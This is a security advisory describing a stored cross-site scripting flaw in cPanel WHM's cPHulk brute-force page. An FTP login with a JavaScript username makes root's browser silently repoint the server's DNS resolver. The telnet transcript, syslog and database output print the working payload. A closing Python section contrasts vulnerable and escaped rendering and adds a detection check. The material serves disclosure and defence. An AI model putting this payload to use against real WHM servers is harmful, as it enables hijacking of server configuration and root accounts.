cPanel 11.11.0-CURRENT_16774 - XSS in WHM in /cgi/tweakcphulk.cgi



DESCRIPTION


cphulkd is a daemon which monitors failed login attempts to various services and, after a set number of failures, prevents logins for a set period of time from the IP addresses that recently failed to authenticate. WHM provides an interface to the root user for viewing the failed login attempts via the "cPHulk Brute Force Protection" link (tweakcphulkd.cgi), part of which displays the username used in the attacks. A remote individual could brute force a service while setting the username to a string of JavaScript. Once the attempt was logged by cphulkd, and once root accessed the cPHulk link in WHM, that JavaScript string would be executed by root's browser (assuming JavaScript is enabled).


[user@host ~]$ telnet example.com 21
Trying 1.2.3.4...
Connected to example.com (1.2.3.4).
Escape character is '^]'.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 13:30. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER <script>window.location="https://example.com:2087/scripts2/setupresolvconf3?main=&nameserver1=6.6.6.6"</script>
331 User <script>window.location="https://example.com:2087/scripts2/setupresolvconf3?main=&nameserver1=6.6.6.6"</script> OK. Password required
PASS a
530 Login authentication failed


This is what the syslog looked like:

Sep  5 13:30:19 host pure-ftpd: (?@x.x.x.x) [WARNING] Authentication failed for user
[<script>window.location="https://example.com:2087/scripts2/setupresolvconf3?main=&nameserver1=6.6.6.6"
</script>] 


and this is what the "logins" table from the cphulkd db looked like:

mysql> select * from logins \G
*************************** 1. row ***************************
     USER: <script>window.location="https://example.com:2087/scripts2/setupresolvconf3?main=&nameserver1=6.6.6.6"</script>
       IP: 1.2.3.4
  SERVICE: system
   STATUS: 0
LOGINTIME: 2007-09-05 13:30:19 


Now once root logged into WHM, clicked "Security Center", then clicked the "cPHulk Brute Force Protection" link, this would appear in their browser if they had javascript enabled:

Resolver Setup Step 3
Your resolvers have been setup!

Listed in order they are: 6.6.6.6
Warning: You only specified one resolver! If this dns server fails, your server may not function. You should go back
and specify additional resolvers. 


Now observe the contents of /etc/resolv.conf:

[root@host:~]# cat /etc/resolv.conf
nameserver 6.6.6.6



IMPACT


Remote attackers could potentially cause requests of their choice to be issued to WHM by root. This includes possibly changing the root password of the server, changing the resolvers in /etc/resolv.conf, and more.
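The root cause above is that tweakcphulk.cgi writes the attacker-controlled username from the cphulkd "logins" table into the WHM page without encoding it. The following Python is an added example written for this advisory, not cPanel's own code: it takes the syslog line and the logins row shown in the transcript as constructed sample input, shows the unescaped rendering that reproduces the problem beside an HTML-escaped rendering that neutralises it, and adds a small check that flags markup characters in a failed-login username so such attempts can be alerted on. The log-line regular expression is an assumption fitted to the single pure-ftpd line on this page, and the table-row markup is a stand-in for whatever the real CGI emits.

```python
import html
import re

# Constructed sample input, copied from the advisory's transcript: the
# pure-ftpd syslog line and the row cphulkd stored in its "logins" table.
SAMPLE_USER = (
    '<script>window.location="https://example.com:2087/scripts2/'
    'setupresolvconf3?main=&nameserver1=6.6.6.6"</script>'
)
SAMPLE_SYSLOG_LINE = (
    "Sep  5 13:30:19 host pure-ftpd: (?@x.x.x.x) [WARNING] "
    "Authentication failed for user [" + SAMPLE_USER + "]"
)
SAMPLE_LOGIN_ROW = {
    "USER": SAMPLE_USER,
    "IP": "1.2.3.4",
    "SERVICE": "system",
    "STATUS": 0,
    "LOGINTIME": "2007-09-05 13:30:19",
}

# Assumed pattern for pure-ftpd authentication failures, derived only from
# the sample line above; the bracketed username is taken verbatim.
PUREFTPD_AUTH_FAIL = re.compile(
    r"pure-ftpd: \([^@]*@(?P<ip>[^)]*)\) \[WARNING\] "
    r"Authentication failed for user \[(?P<user>.*)\]\s*$"
)

# Characters that turn plain text into HTML or attribute context when
# interpolated without encoding.
MARKUP_CHARS = re.compile(r"[<>\"'&]")


def parse_pureftpd_failure(line):
    """Return (ip, username) from a pure-ftpd auth-failure line, else None."""
    m = PUREFTPD_AUTH_FAIL.search(line)
    if not m:
        return None
    return m.group("ip"), m.group("user")


def username_contains_markup(username):
    """True when an attempted username carries HTML/attribute metacharacters.

    A legitimate username never needs these, so their presence in cphulkd's
    data is worth an alert regardless of whether the admin page escapes them.
    """
    return MARKUP_CHARS.search(username) is not None


def render_login_row_unescaped(row):
    """The vulnerable pattern: stored username interpolated straight into HTML."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (row["USER"], row["IP"])


def render_login_row(row):
    """Hardened rendering: every field HTML-escaped, quotes included, so the
    browser shows the attacker's string as text instead of executing it."""
    fields = ("USER", "IP", "SERVICE", "STATUS", "LOGINTIME")
    cells = [html.escape(str(row[f]), quote=True) for f in fields]
    return "<tr>" + "".join("<td>%s</td>" % c for c in cells) + "</tr>"


if __name__ == "__main__":
    ip, user = parse_pureftpd_failure(SAMPLE_SYSLOG_LINE)
    print("failed login from %s, markup in username: %s"
          % (ip, username_contains_markup(user)))
    print("unsafe :", render_login_row_unescaped(SAMPLE_LOGIN_ROW))
    print("escaped:", render_login_row(SAMPLE_LOGIN_ROW))
```

Escaping at the point of output is the fix that closes this particular hole: the stored row is left untouched (so the evidence of the attack is preserved for the admin), but `<`, `>`, `"`, `'` and `&` are emitted as entities, and the browser renders the payload as inert text. The `username_contains_markup` check is a detection aid for the same data, useful for alerting on log-injection attempts against any admin interface that displays failed-login usernames.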